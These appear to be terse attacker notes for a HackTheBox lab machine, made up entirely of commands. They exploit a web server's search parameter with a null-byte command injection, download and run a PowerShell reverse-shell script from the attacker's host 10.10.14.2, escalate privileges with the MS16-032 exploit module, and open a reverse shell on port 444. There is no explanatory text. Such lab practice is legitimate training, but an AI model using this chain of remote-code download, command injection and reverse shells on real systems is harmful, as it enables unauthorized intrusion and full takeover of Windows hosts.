cp nishang/Shells/Invoke-PowerShellTcp.ps1 .
/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.2}
/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('
http://10.10.14.2/Invoke-PowerShellTcp.ps1').}
​
cp /root/Data/Lab/Hackthebox/HackTheBox/10.10.10.8/10.10.10.8/Empire/data/module_source/privesc/Invoke-MS16032.ps1
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('
http://10.10.14.2/shell.ps1
')"
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 444